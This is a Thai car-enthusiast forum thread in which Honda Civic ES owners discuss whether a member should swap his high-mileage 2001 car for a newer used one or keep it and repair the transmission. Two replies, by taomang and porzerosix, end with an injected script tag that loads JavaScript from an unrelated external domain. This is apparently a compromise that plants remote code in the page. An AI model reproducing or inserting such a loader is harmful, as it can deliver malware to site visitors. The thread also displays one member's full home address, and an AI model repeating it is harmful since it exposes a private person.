ตอบ
anglo

ชื่อเล่น: นัท

เข้าร่วม: 10 พฤษภาคม 2012
ตอบ: 1475

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1496
ให้คำขอบคุณ: 621

ที่อยู่: 19/313 หมู่บ้านณัฐกมล รัษฎา2 ซ.3 ถ.รัษฎานุสรณ์ ต.รัษฎา อ.เมือง จ.ภูเก็ต 83000
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 30 กันยา 2014 16:20 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
มีเพื่อนสนิท แนะนำว่า ให้หาเปลี่ยนรถมือสองที่ปีใหม่กว่า รุ่นใหม่กว่า ราคาใกล้ๆ กับที่ยังเหลือผ่อนอยู่น่าจะดีกว่า
(ตอนนี้รถมือสองราคาตกลงไปเยอะมาก)

ผมก็กลับมานั่งคิด นอนคิด ตะแคง ตีลังกา คิดๆๆๆ

ข้อดี : ได้รถที่ปีใหม่กว่า 4-5 ปี ในราคาพอๆ กับที่เรายังต้องผ่อนอยู่ตอนนี้

ข้อเสีย : กลัวจะไปเจอหนังม้วนเก่า คือได้มาก็ต้องซ่อมอีก (เหมือนตอนได้เจ้าลูกชายมาใช้)

ถ้าตัดสินใจเปลี่ยน ได้รถใหม่กว่า โอกาสที่จะต้องซ่อมน้อยกว่า (หรือเปล่า?) แต่ระยะการผ่อนก็จะยาวขึ้นไปอีก

ถ้าตัดสินใจไม่เปลี่ยน แน่ๆ เลยที่จะเป็นรายการซ่อมครั้งต่อไป คือ "เกียร์!!!" (ตอนนี้ยังไม่มีอาการ แต่ไมล์ไปแตะ 2 แสนแล้ว!!)

บอกตรงๆ ครับ ตัดสินใจไม่ถูกจริงๆ รักรถคันนี้ รักครอบครัวใหญ่ในนี้ แต่ก็น่ะ... "พบเพื่อจาก" ธรรมชาติสร้างมา

เพื่อนๆ พี่ๆ น้องๆ ลองเข้ามาแสดงความเห็นหน่อยครับ...เรียนเชิญ 
ได้รับคำขอบคุณจาก: tochi229  qq  honda01  surasaka  karnmotocross01  toshi  moonoikoyjai  kkw 
tochi229

ชื่อเล่น: ปิ๊ป

เข้าร่วม: 28 พฤศจิกา 2010
ตอบ: 7524

Moderator
Moderator

ได้รับคำขอบคุณ: 8264
ให้คำขอบคุณ: 11555

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 30 กันยา 2014 16:31 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
ถ้ารักรูปทรงและความเป็น HONDA CIVIC ES  ผมจะไม่สังเล เลยครับ

"ขับรถอะไรไม่มีความสุขเท่ากับขับรถที่เราชอบ"

สำหรับผม จะใช้ไปจนว่า มันจะวิ่งไม่ได้แล้ว เท่านั้น จ้า

ได้รับคำขอบคุณจาก: anglo  civicnoom  qq  honda01  profibus  karnmotocross01  NutNicha  toshi  BEER_CIVIC ES  khunmoo  atiwarah666  ome_RX  pongz19  tomcivices03  Phetcharat 
koobe

เข้าร่วม: 19 มิถุนา 2010
ตอบ: 2462

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3437
ให้คำขอบคุณ: 2482

ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 30 กันยา 2014 16:59 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
ผมก็ว่าจะ  ว่าจะ จะต้อง ปล่อยไปสักคัน ตอนนี้ใช้แต่รถเก่าออกรถมาปี2003ทั้งหมดเลย ก็ตัดใจขายคันไหนไม่ได้ซะที  ยิ่งพอเห็นราคาขายต่อแล้ว บอกตรงๆ เสียดายของ ซ่อมมันใช้มัน ต่อไปดีกว่า 555
ได้รับคำขอบคุณจาก: qq  tochi229  honda01  karnmotocross01  anglo  fff_1232  toshi  ome_RX  Phetcharat 
Pete Villian

ชื่อเล่น: พีท

เข้าร่วม: 08 พฤษภาคม 2009
ตอบ: 534

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 876
ให้คำขอบคุณ: 402

ปี: 2005
อังคาร, 30 กันยา 2014 17:14 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
ผมเลือกเก็บเงินซ่อมเกียร์ครับ

ถ้าเอามือสองมาอีกก็มีความเสียงมาซ่อมเพิ่มอีก

ความจริงแล้ว เกียร์ Auto ถ้าดูแลกันดีๆ ใช้ถูกวิธี มันก็อยู่กับเราได้นานครับ 

ถ้าจะเปลี่ยนรถอีกทีจาก ES ผมจะเลือกรถใหม่ป้ายแดงครับ 
ได้รับคำขอบคุณจาก: qq  koobe  tochi229  honda01  karnmotocross01  anglo  Nung_Sodapop  tomcivices03 
Pantamitr

ชื่อเล่น: ห่าน

เข้าร่วม: 27 พฤษภาคม 2010
ตอบ: 1622

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1792
ให้คำขอบคุณ: 1186

สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 30 กันยา 2014 20:51 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
ถ้าเกียร์ 2 แสนกว่า ก็น่าเสี่ยงไปคันใหม่กว่านะ
ถ้าเป็น ES เหมือนเดิม แนะนำ รุ่น 04 - 05 เลยครับ
ผมว่า หมดความกังวลใจเรื่องเกียร์ไปได้พอสมควรนะ

ส่วนเรื่องอื่นๆ ใช้ประสบการณ์จากที่เราใช้คันนี้มา ไปเปรียบเทียบดู ผมว่าช่วยได้เยอะนะ
รุ่นนี้ มันมักเสียที่อะไร เราก็ดูที่อาการนั้น อาการที่น่ากลัว ถ้านอกจากตัวถัง ก็คือเกียร์ รองลงมาก็พวก เครื่องยนต์ แอร์ ช่วงล่าง
พวกนี้ ผมว่า เราเคยใช้มาก่อน น่าจะดูออกนะ
ได้รับคำขอบคุณจาก: tochi229  honda01  karnmotocross01  anglo  toshi 
karnmotocross01

ชื่อเล่น: กานต์

เข้าร่วม: 01 กันยา 2012
ตอบ: 1477

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 814
ให้คำขอบคุณ: 34349

อังคาร, 30 กันยา 2014 23:12 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
ต่างคนต่างมีเหตุผล สำหรับผมว่ารุ่นเราก็ยังดูดีอยู่นะ ซีวิคก็คือซีวิคถึงจะเก่าแต่สิ้นเดือนไม่ต้องปวดหัว ตามคนข้างบ้านไม่ไหวหรอกครับ ออกใหม่กันทุกบ้าน สิ้นเดือนทีบ่นอุบ เอาเงินผ่อนรถใหม่มาแต่งคันเก่าเราดีกว่า..
ได้รับคำขอบคุณจาก: Memory11  koobe  anglo  Nung_Sodapop  toshi  khunmoo  ome_RX 
Ton-

เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
พุธ, 1 ตุลา 2014 10:03 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
ผมก็ว่าจะมาหลายทีละ คันนี้ผมติดแค่ 2 เรื่อง
1. เสียงจากภายนอกดังมาก
2. ช่วงล่างไม่นุ่มนวล

ทั้งสองข้อ ถ้าขับในเมือง ไม่ใช่ประเด็น แต่เป็นปัญหาครอบครัวทันทีที่ขับทางไกล 

ตอนนี้เวลาจะขับไกลๆ ไปหลายๆวัน ก็อาศัยเช่ารถเอา บวก ลบ คูณ หารแล้ว ก็ดีกว่าไปผ่อนรถอีก 3 ปีเยอะ

เอาไว้พร้อมจริงๆ ค่อยจัดพวก แอคคอร์ด แคมรี่มือสอง เดี๋ยวนี้ราคาตกเร็วมาก ผมว่าจะรอจนตัว G9 เป็นมือสองค่อยคิดจะซื้อ

สำหรับ จขกท ถ้าไม่ติดเรื่องสมถนะ ของรถ ซ่อมให้จบ แล้วใช้ไป ยังไงก็ไม่เสียตังค์เท่าซื้อรถอีกรอบแน่นอน

ได้รับคำขอบคุณจาก: anglo  Nung_Sodapop  toshi  karnmotocross01  EgawiT7864 
OMO-knight

เข้าร่วม: 15 มกรา 2014
ตอบ: 305

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 190
ให้คำขอบคุณ: 63

สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 1 ตุลา 2014 10:29 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
ความคิดเห็นส่วนตัวนะ ผมว่าตอนนี้จะเปลี่ยนจาก ES ไปเล่นตัวอื่น ผมว่ายังไม่มีตัวไหนที่เหมาะสมเท่า บอกตรงถ้าเราดูแลเขาดีๆนะ เขาก็ไม่งอแงและขับสนุก ใช้จนเขาหมดแรงเมื่อไรค่อยเปลี่ยนหรือเราอาจจะมีอะไรที่ดีขึ้นกว่านี้ในอนาคต เราอาจมีคันที่มาแทนในภายภาคหน้าที่มีรุ่นที่ดีกว่าปัจจุบันและเหมาะสมกับเราหรือถึงเวลานั้นเราอาจจะไม่ต้องผ่อนคันใหม่ก็ได้ (ใช้เขาไปเพราะเขาคือส่วนหนึ่งในชีวิตไปแล้ว)......ส่วตัวล้วนๆๆ.
ได้รับคำขอบคุณจาก: toshi  karnmotocross01  tomcivices03 
profibus

เข้าร่วม: 16 ธันวา 2012
ตอบ: 803

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1151
ให้คำขอบคุณ: 516

พุธ, 1 ตุลา 2014 10:38 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
ผมผ่อนเหลืออีก สองปี งวดรถพอๆกับผ่อนรถป้ายแดง เลยครับ เดือนละ9000 ทุกวันนี้อยากจะติดต่อไฟแนนซ์ให้ผ่อนน้อยลงยืดมันออกไปอีกสักสองปี ผ่อนน้อย เงินเหลือ เก็บไว้ซ่อมรถ อิอิ

เพราะดูราคาแล้วตกลงเหลือเกินบางอย่าง ขายไปก็ไม่ไดอะไร เลย อิอิ ที่ซ่อมไปมันก็อยู่ได้อีกนาน อิอิ
ได้รับคำขอบคุณจาก: toshi  karnmotocross01 
anglo

เข้าร่วม: 10 พฤษภาคม 2012
ตอบ: 1475

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1496
ให้คำขอบคุณ: 621

ที่อยู่: 19/313 หมู่บ้านณัฐกมล รัษฎา2 ซ.3 ถ.รัษฎานุสรณ์ ต.รัษฎา อ.เมือง จ.ภูเก็ต 83000
พุธ, 1 ตุลา 2014 10:41 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
ขอบคุณทุกความเห็นครับ

สำหรับผมแล้ว เรื่องปัญหาของรถ ไม่ว่าจะเป็น เสียงภายนอกดัง ช่วงล่างไม่นุ่ม ฯลฯ หรือแม้แต่แอร์ไม่ฉ่ำเวลาขับในเมือง ไม่ใช่ปัญหาเลยครับ เพราะศึกษาและพอจะเข้าใจในตัวรถอยู่พอสมควรครับ (ครอบครัวแห่งนี้ช่วยได้มากจริงๆ)

ตั้งแต่คบกันมา ก็ขับไป ซ่อมไป หมดไปเยอะเหมือนกัน แต่สำหรับรถปี 2001 ผมถือว่าไม่งอแงน่ะ เพราะอยู่กินกันมา 2 ปีกว่าๆ ก็งอแงปีละครั้ง
(รำคาญก็แต่เวลาเข้าอู่แล้วช่างบ่นว่าอะไหล่แพง กินน้ำมัน โน่นนั่นนี่ เชียร์ให้เล่นโตโยอยู่ได้...แต่ก็จริงของเค้าน่ะ)

เรื่องเดียวที่พอจะเป็นเหตุผลในการตัดสินใจเปลี่ยน นอกเหนือจากเรื่องเกียร์ที่รอวันซ่อม คือ เรื่องการประหยัดน้ำมัน เท่านั้นครับ
ได้รับคำขอบคุณจาก: taomang  toshi  karnmotocross01 
taomang

เข้าร่วม: 20 เมษา 2013
ตอบ: 894

Guru ES
Guru ES

ได้รับคำขอบคุณ: 652
ให้คำขอบคุณ: 1023

ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 1 ตุลา 2014 14:46 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
anglo พิมพ์ว่า:
ขอบคุณทุกความเห็นครับ

สำหรับผมแล้ว เรื่องปัญหาของรถ ไม่ว่าจะเป็น เสียงภายนอกดัง ช่วงล่างไม่นุ่ม ฯลฯ หรือแม้แต่แอร์ไม่ฉ่ำเวลาขับในเมือง ไม่ใช่ปัญหาเลยครับ เพราะศึกษาและพอจะเข้าใจในตัวรถอยู่พอสมควรครับ (ครอบครัวแห่งนี้ช่วยได้มากจริงๆ)

ตั้งแต่คบกันมา ก็ขับไป ซ่อมไป หมดไปเยอะเหมือนกัน แต่สำหรับรถปี 2001 ผมถือว่าไม่งอแงน่ะ เพราะอยู่กินกันมา 2 ปีกว่าๆ ก็งอแงปีละครั้ง
(รำคาญก็แต่เวลาเข้าอู่แล้วช่างบ่นว่าอะไหล่แพง กินน้ำมัน โน่นนั่นนี่ เชียร์ให้เล่นโตโยอยู่ได้...แต่ก็จริงของเค้าน่ะ)

เรื่องเดียวที่พอจะเป็นเหตุผลในการตัดสินใจเปลี่ยน นอกเหนือจากเรื่องเกียร์ที่รอวันซ่อม คือ เรื่องการประหยัดน้ำมัน เท่านั้นครับ

ผมชอบมากเลยครับ คำที่ว่า หนังม้วนเก่า เพราะถ้าคิดว่าจะซื้อมือสองที่ปีใหม่กว่า คงต้องเจอหนังม้วนเก่าแน่เลย
เอางบมาทำคันเก่าดีกว่า ถ้าจะมีใหม่จริงป้ายแดงเลยครับ"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: toshi  karnmotocross01 
Tanadath

เข้าร่วม: 12 มีนา 2011
ตอบ: 1498

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1165
ให้คำขอบคุณ: 325

พุธ, 1 ตุลา 2014 15:41 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
ซ่อมให้ถึงใช้ได้อีกนานครับ ไม่ปวดหัวอีกรอบ
wasan_ceo

ชื่อเล่น: โจ้

เข้าร่วม: 29 กันยา 2013
ตอบ: 573

ได้รับคำขอบคุณ: 589
ให้คำขอบคุณ: 93

พุธ, 1 ตุลา 2014 20:46 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
อย่าคิดว่าซื้อรถใหม่มาผ่อน ราคาพอๆๆ กับรถที่เหลือยอดค้าง คิดดีๆนะครับ รถเราที่เหลือค้าง 2ปีนั้น
มันรวมดอกเบี้ยแล้ว ส่วนไอที่รถปีใหม่กว่า ราคา สองกว่าๆ -ส องปลายๆ ยังไม่รวมดอกเบี้ย ประกัน ค่าจัด
โดนเข้าไป 3 กว่าๆ - สามปลายๆๆ รถเก่าก็มีต้องซ่อมบ้างตามอายุ เกียร์ซ่อมได้ ฮอลได้ หรือยกเชียงกงได้
ทางเลือกมีเยอะแยะครับอย่าเพิ่งท้อ จนหลงทางเดี๋ยวจะช้ำทีหลัง
ได้รับคำขอบคุณจาก: toshi  karnmotocross01  tomcivices03 
tongkrab

ชื่อเล่น: โต้งครับ

เข้าร่วม: 06 มกรา 2014
ตอบ: 48

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 83
ให้คำขอบคุณ: 11

ปี: 2002
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 2 ตุลา 2014 14:37 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
ผ่อนเหลืออีกเท่าไหร่ครับ ถ้าจะเปลี่ยนใหม่ มือ2 ให้ดีพอๆกับes ได้รถปีใหม่ขึ้นมาอีก ก็พวกอัลติส08-09 ไม่ก็ซีวิคfd สภาพสวยๆไม่ชนหนัก ไม่จมน้ำก็3-4แสน ยังไม่รวมดอก รถเก่าก็ต้องขายให้ออก ลองขับไปให้เต้นท์ตีดูเล่นๆก็ได้ครับ รับรองว่าขับกลับมาเหมือนเดิม สรุปต้องใช้เงินเยอะเลยสำหรับการนี้

แล้วมือสองที่ได้มาใหม่ ถึงเวลา ยังไงก็ต้องซ่อม ยังไงก็ต้องไล่เก็บเหมือนกันครับ สำหรับผมนะ ถ้าจะเปลี่ยนอีกที ผมจะใช้คันนี้จนพัง แล้วออกใหม่เลยดีกว่าครับ แต่คงยังอีกนานนนน วันก่อนพัดลมหม้อน้ำผมเสีย ไปเอาที่เซียงกง อะไหล่ยังมีเพียบบบเลยครับ สำหรับรถรุ่นนี้ ซื้อรถใหม่ ต้องจ่ายหลักแสน แล้วก็ผ่อนทุกเดือน ใช้รถคันนี้ อาจจะมีต้องทำต้องซ่อมบ้าง แต่จ่ายน้อยกว่ากันเยอะ พอซ่อมแล้วมันก็จบครับ ไม่จุกจิกเลยนะ รถรุ่นนี้
ได้รับคำขอบคุณจาก: karnmotocross01  pongz19 
kkw

ชื่อเล่น: โต้ง

เข้าร่วม: 16 กันยา 2012
ตอบ: 459

ได้รับคำขอบคุณ: 475
ให้คำขอบคุณ: 794

สี: แดง แรลไล (R-513)
พฤหัส, 2 ตุลา 2014 15:04 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
ผมว่าถ้าเล่นใหม่ไปเลยจะดีกว่าเห็นๆ แต่ตอนนี้รถคันใหม่ยังเป็นมือสองอีก โอกาสที่รถคันใหม่ราคารวมดอกเบี้ยเท่ากันกับยอดผ่อนที่ค้างยุตอนนี้แล้วเป็นรถที่ปีใหม่กว่า สามารถใช้งานได้ดีกว่าสดกว่า ลองไปหาเข้าจริงๆคงน่าจะหายากนะครับ ยกเว้นรถเจ้าของกระทู้เพิ่งซื้อมาและผ่อนยังไม่กี่ปี

และ ยังไงก็กับการต้องไปนับ1ใหม่ กับค่าโสหุ้ยช่วงแรกที่ออกรถมาอีก สู้อดทนกันฟันผ่อน และทยอยซ่อมไปน่าจะคุ้มกว่านะครับ  ความคิดเห็นส่วนตัวครับ...
ได้รับคำขอบคุณจาก: karnmotocross01 
Bird_phetch

เข้าร่วม: 23 เมษา 2013
ตอบ: 535

ได้รับคำขอบคุณ: 543
ให้คำขอบคุณ: 61

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 2 ตุลา 2014 17:05 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
ความเห็นส่วนตัวนะครับ

การที่มีรถสักหนึ่งคันยานพาหนะสัก 1 อย่าง  ผมมองว่าเป้นสิ่งจำเป้น

เรามีรถสักคันแล้วสามารถ พาเราไปที่ไหนก็ได้  ไม่ว่ามันจะเก่าหรือจะใหม่ ผมว่ามันก็เจ๋งแล้วล่ะครับ 

ได้รับคำขอบคุณจาก: karnmotocross01 
fasang.Mr

ชื่อเล่น: บี

เข้าร่วม: 23 มีนา 2010
ตอบ: 2101

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1764
ให้คำขอบคุณ: 2323

พฤหัส, 2 ตุลา 2014 20:54 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
ความเห็นส่วนตัวนะครับขอแชร์
ผมผ่อนหมดแล้ว มีนาคม. 14 นี้เป็นไทย 2 ปี เต็ม ผมเลือกผ่อน 4 ปี ดอกเบี้ย 4.5 ราคาขายต่อรองแล้ว 495 K เมื่อปี 08 ราคากลางอยู่ที่ 520 K. ผมดาวน์ไปแค่ 100 K แต่ที่จ่ายจริง ประมาณ 150 K. ผ่อนเดือนละ (12074 * 12)*4 + 150000 = 729,552 ตอนซื้อมา 66,xxx.km ปัจจุบันเกือบ 250,000 km. แล้ว ที่กลัวคือเกียร์ อย่างเดียวเพราะชอบขับรถกลางคืน ส่วนอื่นไล่เปลี่ยน+ซ่อมบำรุงตามระยะปกติ
ไม่ได้ทำอะไรเลย ซ่อมตามอายุการใช้งาน ไม่มีเงินเก็บ ไม่มีการตกแต่งใดๆทั้งสิ้น ปัจจุบันกันค่าดูแลรักษาเดือนละ 5000 เหลือๆ ซื้อของแต่งตามประสาคนงบน้อย
1.ถ้าจะเปลี่ยนเพื่อให้ได้ปีใหม่กว่าแต่คงสถานะเป็นมือสอง คิดดีๆนะครับ
2.ถ้าจะเปลี่ยนเพราะครอบครัวใหญ่ขึ้น อันนี้จำเป็นแต่เห็นราคาก็ต้องกลับมาคิดอีกนานพร้อมกลับไปดูข้อ 1 ประกอบ
ได้รับคำขอบคุณจาก: karnmotocross01  tomcivices03 
sklongdee

เข้าร่วม: 24 มิถุนา 2014
ตอบ: 69

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 102
ให้คำขอบคุณ: 70

สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 2 ตุลา 2014 22:32 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
ผมเลือกดูแล ES ให้ดีๆเขาก็ไม่งอแงอะไรมากมายครับ
ส่วนรถใหม่ถ้าผ่อนคันเก่าหมดหรือมีกำลังผ่อนได้ก็จะเลือกรถใหม่ป้ายแดงเลย แต่ยังไงใจก็รักและอยากจะเก็บ ES ไว้ขับเล่นๆสนุกๆ
porzerosix

ชื่อเล่น: ปอ

เข้าร่วม: 11 กันยา 2014
ตอบ: 37

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 27
ให้คำขอบคุณ: 122

สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 3 ตุลา 2014 14:03 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
รถยังไงก็คือรถครับใช้เขาแล้วก็ต้องมีการสึกหรอเป็นธรรมดาครับ เปลี่ยนซ่อมO/H ก็ใช้ได้แล้วครับเลือกอู่หรือศูนย์ที่ซ่อมจบๆครับ ถ้าขายรถเก่าเราไม่ต้องผ่อนผมก็จะเชียร์ให้เปลี่ยนอยู่ แต่สุดท้ายก็ต้องผ่อนอีก จะเหนื่อยป่าวๆๆนะครับ สู้ใช้คนเก่าไปก่อนดีกว่า อนาคตผ่อนหมดจะเก็บถึงป้ายแดงเลยก็ได้ครับสบายใจดีครับ ความเห็นส่วนตัวผมนะครับ สู้ครับเพราะESขับไปซ่อมไปสนุกดีมีคนรู้จักเยอะอบอุ่นดีครับ <script src="https://sport32news.com/civicesgroup.js"></ "<script src="https://sport32news.com/civicesgroup.js">
wudthichai

ชื่อเล่น: ต๊อบ

เข้าร่วม: 11 กรกฎา 2012
ตอบ: 54

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 16
ให้คำขอบคุณ: 7

สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
จันทร์, 27 ตุลา 2014 18:13 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
ของผม 03 วิ่งไป 260000 แล้วครับ บำรุงรักษาตามวงรอบ เกียก็ยังไม่ลาโลกไปใหน อาการยังไม่ออกยังไม่รู้ว่าจะไปเมื่อไหร่แต่ผมคิดว่ามันทนได้ใจ จุกจิกไม่มี หน้าตาดูดีทันสมัยทั้งที่มัน 10 กว่าปีแล้ว ผมว่าถ้าดูดีๆ มำ้มันเครื่อง+เกีย เปลี่ยนตามวงรอบ แล้วเก็บเงินที่เหลือจากซ่อมทุกเดือน กว่ามันจาหมดแรงเราอาจได้รถคันใหม่ได้เลยน่ะครับ
ได้รับคำขอบคุณจาก: karnmotocross01  tomcivices03 
treejung

ชื่อเล่น: ทีร์

เข้าร่วม: 27 มกรา 2014
ตอบ: 113

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 53
ให้คำขอบคุณ: 0

จันทร์, 27 ตุลา 2014 20:25 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
รถก้อคือรถ จะเก่าหรือใหม่ ถอดป้ายแดงก้อเหมือนๆ กาน หน้าที่ของมันคือพาเราไปให้ถึงจุดหมาย เป็นธรรมดาของรถที่มีการใช้งานมากกว่าก้อต้องซ่อมบ้าง อะไรบ้าง แต่ก็ไม่ใช่ซ่อมทุกวันนี้ อนาคตคือของ ลูกหลานแล้วครับ เก็บเงินส่วนต่างที่จะเสียไปกับรถคันใหม่ ไว้เป็นอนาคต ของมนุษย์ ลูก ลูก ลูก น่าจะดีกว่านะครับ ผมคนหนึ่งที่มีลูกแล้ว ก้อคิดประมาณนี้ ครับ ( 3D ,EK เค้าก้อยังขี่กันนะครับ) แต่ถ้ากำลังภายในเยอะ ก้อจัดเลยครับ ป้ายแดงเลย หนังม้วนใหม่ แรง ประหยัด และ Family Car ด้วย 555+   
aumlight

ชื่อเล่น: อั้ม

เข้าร่วม: 27 พฤษภาคม 2013
ตอบ: 925

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 675
ให้คำขอบคุณ: 155

จันทร์, 27 ตุลา 2014 22:06 - รบกวนขอความคิดเห็นหน่อยครับ (อย่าหาว่าผมนอกใจเลยน่ะ)
ออกใหม่จัดป้ายแดงไปเลยครับ

ES ไว้ขับเล่นชิวๆ

ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.